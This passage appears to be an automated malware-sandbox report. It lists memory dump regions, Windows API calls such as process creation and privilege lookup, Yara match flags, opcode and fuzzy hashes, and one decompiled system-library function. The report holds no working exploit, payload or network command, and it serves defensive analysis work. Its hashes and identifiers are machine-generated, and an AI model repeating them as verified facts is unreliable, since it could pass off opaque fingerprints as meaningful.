                                  Memory Dump Source
                                  • Source File: 00000010.00000002.497241388.0000000004C40000.00000040.00000001.sdmp, Offset: 04C40000, based on PE: true
                                  • Associated: 00000010.00000002.497867212.0000000004D5B000.00000040.00000001.sdmp
                                  • Associated: 00000010.00000002.497889964.0000000004D5F000.00000040.00000001.sdmp
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: 1164f27e810ea36b47ed006e9a2ab0222ab41c82f818ff575fd4d553da12c750
                                  • Instruction ID: ca94eee55168fc7d5bdd2cda77570fbf226ba90528d4f8f711a704a2db83db12
                                  • Opcode Fuzzy Hash: 1164f27e810ea36b47ed006e9a2ab0222ab41c82f818ff575fd4d553da12c750
                                  • Instruction Fuzzy Hash: A09002F120100503F181715944047860106D7D0345F61C021A5465554EC699EDD576E5
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000010.00000002.497241388.0000000004C40000.00000040.00000001.sdmp, Offset: 04C40000, based on PE: true
                                  • Associated: 00000010.00000002.497867212.0000000004D5B000.00000040.00000001.sdmp
                                  • Associated: 00000010.00000002.497889964.0000000004D5F000.00000040.00000001.sdmp
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: 037014b67b353a8c2e012363d08ab5fd7b70ff64edd9900382b49e6b8265a557
                                  • Instruction ID: c5bfa7e406be5cefe288d6efc75c1d720f7f64d1581952ab524ccce671b4b950
                                  • Opcode Fuzzy Hash: 037014b67b353a8c2e012363d08ab5fd7b70ff64edd9900382b49e6b8265a557
                                  • Instruction Fuzzy Hash: A29002A121180143F24165694C14B470106D7D0347F61C125A0555554CC955E86165A1
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 0303834A
                                  • PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 0303836B
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000010.00000002.495966407.0000000003030000.00000040.00020000.sdmp, Offset: 03030000, based on PE: false
                                  Yara matches
                                  Similarity
                                  • API ID: MessagePostThread
                                  • String ID: 3333
                                  • API String ID: 1836367815-2924271548
                                  • Opcode ID: 82a5ee899fb930b10c1c4bb489411ec9d2010d91c806830f37cbb8d6c4bc0a7d
                                  • Instruction ID: 9df7671a2a7d34c0bdda152f71b0f2c3705167e71d0edb3307cffb494ebbbf66
                                  • Opcode Fuzzy Hash: 82a5ee899fb930b10c1c4bb489411ec9d2010d91c806830f37cbb8d6c4bc0a7d
                                  • Instruction Fuzzy Hash: 68014C357477193BEB24E5685C42FBD738C5F83A30F0C81A9FA48EE2C0DA5494050296
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,03033AF8), ref: 0304A08D
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000010.00000002.495966407.0000000003030000.00000040.00020000.sdmp, Offset: 03030000, based on PE: false
                                  Yara matches
                                  Similarity
                                  • API ID: FreeHeap
                                  • String ID: .z`
                                  • API String ID: 3298025750-1441809116
                                  • Opcode ID: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
                                  • Instruction ID: e28ebc6f7c795f0fe5de6eb8cf75b3fc85175b6db14034f41f302552e9976211
                                  • Opcode Fuzzy Hash: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
                                  • Instruction Fuzzy Hash: 2BE012B6200208BBDB18EF99CC49EA777ACAF88650F018558BA185B241C630E9108AB0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 0303834A
                                  • PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 0303836B
                                  Memory Dump Source
                                  • Source File: 00000010.00000002.495966407.0000000003030000.00000040.00020000.sdmp, Offset: 03030000, based on PE: false
                                  Yara matches
                                  Similarity
                                  • API ID: MessagePostThread
                                  • String ID:
                                  • API String ID: 1836367815-0
                                  • Opcode ID: 6d24fa169afa7d971b2b1bed84f5191ef6c2a68e3a598c756c39e784be85e7d3
                                  • Instruction ID: c5fc027ae673389358ed671ee7beb7cba6a0a8dec35b1f4fbe6ae016a71967e6
                                  • Opcode Fuzzy Hash: 6d24fa169afa7d971b2b1bed84f5191ef6c2a68e3a598c756c39e784be85e7d3
                                  • Instruction Fuzzy Hash: 8701F971A823247BEB21E6988C42FFE7B6CAB41B50F084158FF04BE1C1E694650647E5
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 0303834A
                                  • PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 0303836B
                                  Memory Dump Source
                                  • Source File: 00000010.00000002.495966407.0000000003030000.00000040.00020000.sdmp, Offset: 03030000, based on PE: false
                                  Yara matches
                                  Similarity
                                  • API ID: MessagePostThread
                                  • String ID:
                                  • API String ID: 1836367815-0
                                  • Opcode ID: c7fc2a5f69c1d358cb08d19fc6b82389f9e8c0a6b9b865c62a2b7bfc84e48788
                                  • Instruction ID: fd1c502b6ae9d5ea6bd00c91bfea7f96d3301c83fa286fe4db511261d7f91720
                                  • Opcode Fuzzy Hash: c7fc2a5f69c1d358cb08d19fc6b82389f9e8c0a6b9b865c62a2b7bfc84e48788
                                  • Instruction Fuzzy Hash: EC01DB75A823287BE720E6989C42FFF776C6B81B51F044158FF08BE1C1E6946A0647F6
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 0304A124
                                  Memory Dump Source
                                  • Source File: 00000010.00000002.495966407.0000000003030000.00000040.00020000.sdmp, Offset: 03030000, based on PE: false
                                  Yara matches
                                  Similarity
                                  • API ID: CreateInternalProcess
                                  • String ID:
                                  • API String ID: 2186235152-0
                                  • Opcode ID: 1a6500c2d7c005fb88a90302c2cf9c1b6a0b4b6aa6edbe83f1df620e056b6ddc
                                  • Instruction ID: 34cdd626b8e412b8490252787a7ece5d7dc051187905f7657888cd8c99ed26f6
                                  • Opcode Fuzzy Hash: 1a6500c2d7c005fb88a90302c2cf9c1b6a0b4b6aa6edbe83f1df620e056b6ddc
                                  • Instruction Fuzzy Hash: A5019DB6211108BFCB58DF99DC91EEB37A9AF8C754F158258BA1D97241C630E851CBA0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 0304A124
                                  Memory Dump Source
                                  • Source File: 00000010.00000002.495966407.0000000003030000.00000040.00020000.sdmp, Offset: 03030000, based on PE: false
                                  Yara matches
                                  Similarity
                                  • API ID: CreateInternalProcess
                                  • String ID:
                                  • API String ID: 2186235152-0
                                  • Opcode ID: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
                                  • Instruction ID: 38ba6727aa2444cefa8c6f52a52e80e8562860bda0041b7b9a7d2937b607c503
                                  • Opcode Fuzzy Hash: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
                                  • Instruction Fuzzy Hash: 0C01AFB2210208BFCB54DF89DC80EEB77ADAF8C754F158258BA0D97240C630E851CBA4
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • LookupPrivilegeValueW.ADVAPI32(00000000,?,0303F192,0303F192,?,00000000,?,?), ref: 0304A1F0
                                  Memory Dump Source
                                  • Source File: 00000010.00000002.495966407.0000000003030000.00000040.00020000.sdmp, Offset: 03030000, based on PE: false
                                  Yara matches
                                  Similarity
                                  • API ID: LookupPrivilegeValue
                                  • String ID:
                                  • API String ID: 3899507212-0
                                  • Opcode ID: 11af01476cbed36e5c792d61717c2f149acef67199075897d40bb66426870dc8
                                  • Instruction ID: a578e30ebf9631fd417a1ebe7f2e9ab552257d59446a4de99b3a3c5e64435900
                                  • Opcode Fuzzy Hash: 11af01476cbed36e5c792d61717c2f149acef67199075897d40bb66426870dc8
                                  • Instruction Fuzzy Hash: 3BE022B13882807FDB11CF689C10EE73FA8DF86210F048999ECC94B212C030E916C7B0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • LookupPrivilegeValueW.ADVAPI32(00000000,?,0303F192,0303F192,?,00000000,?,?), ref: 0304A1F0
                                  Memory Dump Source
                                  • Source File: 00000010.00000002.495966407.0000000003030000.00000040.00020000.sdmp, Offset: 03030000, based on PE: false
                                  Yara matches
                                  Similarity
                                  • API ID: LookupPrivilegeValue
                                  • String ID:
                                  • API String ID: 3899507212-0
                                  • Opcode ID: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
                                  • Instruction ID: 13e4509275f424ee8a2a8ddc344b9e0aaae001436776838a2eec0c1601ba6249
                                  • Opcode Fuzzy Hash: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
                                  • Instruction Fuzzy Hash: 11E01AB56002087BDB10DF49CC85EE737ADAF88650F018164BA0C5B241C930E9108BF5
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • RtlAllocateHeap.NTDLL(030444F6,?,03044C6F,03044C6F,?,030444F6,?,?,?,?,?,00000000,00000000,?), ref: 0304A04D
                                  Memory Dump Source
                                  • Source File: 00000010.00000002.495966407.0000000003030000.00000040.00020000.sdmp, Offset: 03030000, based on PE: false
                                  Yara matches
                                  Similarity
                                  • API ID: AllocateHeap
                                  • String ID:
                                  • API String ID: 1279760036-0
                                  • Opcode ID: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
                                  • Instruction ID: 408b5e64ca5beef20f474750d931ebf9b82e6b9310d64687e1c98392a0275105
                                  • Opcode Fuzzy Hash: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
                                  • Instruction Fuzzy Hash: 85E012B6200208BBDB14EF99CC41EA777ACAF88650F118558BA185B241C630F9108AB0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • SetErrorMode.KERNELBASE(00008003,?,03038CF4,?), ref: 0303F6BB
                                  Memory Dump Source
                                  • Source File: 00000010.00000002.495966407.0000000003030000.00000040.00020000.sdmp, Offset: 03030000, based on PE: false
                                  Yara matches
                                  Similarity
                                  • API ID: ErrorMode
                                  • String ID:
                                  • API String ID: 2340568224-0
                                  • Opcode ID: 13ad9fd541bd1014bddf6d437e9ff5c320bbe308f084453bf388b9d9edb01f13
                                  • Instruction ID: 302bf4ff25dc5925045f1edaaecec53395dec406e0fab0c3f4332d517c9fb4e7
                                  • Opcode Fuzzy Hash: 13ad9fd541bd1014bddf6d437e9ff5c320bbe308f084453bf388b9d9edb01f13
                                  • Instruction Fuzzy Hash: 05E02B72B913003BF710EEB2DC43F9A33886F54610F0C4064F948DB2C3EA30D1018610
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • SetErrorMode.KERNELBASE(00008003,?,03038CF4,?), ref: 0303F6BB
                                  Memory Dump Source
                                  • Source File: 00000010.00000002.495966407.0000000003030000.00000040.00020000.sdmp, Offset: 03030000, based on PE: false
                                  Yara matches
                                  Similarity
                                  • API ID: ErrorMode
                                  • String ID:
                                  • API String ID: 2340568224-0
                                  • Opcode ID: cec8ba978ca00a4152f16fa99d3564a32c161d26ed3cfe0d05bc2e8c73902fa4
                                  • Instruction ID: ee39a51a85439c20a335027ae92f901a2da88af23d2fa0d475a7b213417993ac
                                  • Opcode Fuzzy Hash: cec8ba978ca00a4152f16fa99d3564a32c161d26ed3cfe0d05bc2e8c73902fa4
                                  • Instruction Fuzzy Hash: 2AD0A7767903043BE610FAA69C03F6673CC5B45A00F490074F948DB3C3D960E5004165
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000010.00000002.497241388.0000000004C40000.00000040.00000001.sdmp, Offset: 04C40000, based on PE: true
                                  • Associated: 00000010.00000002.497867212.0000000004D5B000.00000040.00000001.sdmp
                                  • Associated: 00000010.00000002.497889964.0000000004D5F000.00000040.00000001.sdmp
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: a4d4b64583fa15904a33c32f88a550fc3fc08f3675a3708aa2624df9e2bbed69
                                  • Instruction ID: 84f3b0a60aa63e30f3dc1dbab4f9a0affe4bf575dab96bea7c20c5c83bd66ca0
                                  • Opcode Fuzzy Hash: a4d4b64583fa15904a33c32f88a550fc3fc08f3675a3708aa2624df9e2bbed69
                                  • Instruction Fuzzy Hash: E8B09BF19014D6C6F751D760460C7177A11BBD4745F26C461D1430641A4778E191F5F5
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Non-executed Functions

                                  C-Code - Quality: 53%
                                  			E04CFFDDA(intOrPtr* __edx, intOrPtr _a4) {
                                  				void* _t7;
                                  				intOrPtr _t9;
                                  				intOrPtr _t10;
                                  				intOrPtr* _t12;
                                  				intOrPtr* _t13;
                                  				intOrPtr _t14;
                                  				intOrPtr* _t15;
                                  
                                  				_t13 = __edx;
                                  				_push(_a4);
                                  				_t14 =  *[fs:0x18];
                                  				_t15 = _t12;
                                  				_t7 = E04CACE00( *__edx,  *((intOrPtr*)(__edx + 4)), 0xff676980, 0xffffffff);
                                  				_push(_t13);
                                  				E04CF5720(0x65, 1, "RTL: Enter CriticalSection Timeout (%I64u secs) %d\n", _t7);
                                  				_t9 =  *_t15;
                                  				if(_t9 == 0xffffffff) {
                                  					_t10 = 0;
                                  				} else {
                                  					_t10 =  *((intOrPtr*)(_t9 + 0x14));
                                  				}
                                  				_push(_t10);
                                  				_push(_t15);
                                  				_push( *((intOrPtr*)(_t15 + 0xc)));
                                  				_push( *((intOrPtr*)(_t14 + 0x24)));
                                  				return E04CF5720(0x65, 0, "RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u\n",  *((intOrPtr*)(_t14 + 0x20)));
                                  			}











                                  APIs
                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 04CFFDFA
                                  Strings
                                  • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 04CFFE01
                                  • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 04CFFE2B
                                  Memory Dump Source
                                  • Source File: 00000010.00000002.497241388.0000000004C40000.00000040.00000001.sdmp, Offset: 04C40000, based on PE: true
                                  • Associated: 00000010.00000002.497867212.0000000004D5B000.00000040.00000001.sdmp
                                  • Associated: 00000010.00000002.497889964.0000000004D5F000.00000040.00000001.sdmp
                                  Similarity
                                  • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                  • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
                                  • API String ID: 885266447-3903918235
                                  • Opcode ID: e664bdf46ab89dc7a68c18abe825032894d0150293f3f6da0ef89b7d77beab3d
                                  • Instruction ID: 65a537d4ec3337fa2d4388cefe4f403822ac9d2657c3fa3136e06cc3812f7b26
                                  • Opcode Fuzzy Hash: e664bdf46ab89dc7a68c18abe825032894d0150293f3f6da0ef89b7d77beab3d
                                  • Instruction Fuzzy Hash: 34F0F632640601BFE6201A45DC02F27BF6BEB44730F140315F728561E1EA62F8709AF4
                                  Uniqueness

                                  Uniqueness Score: -1.00%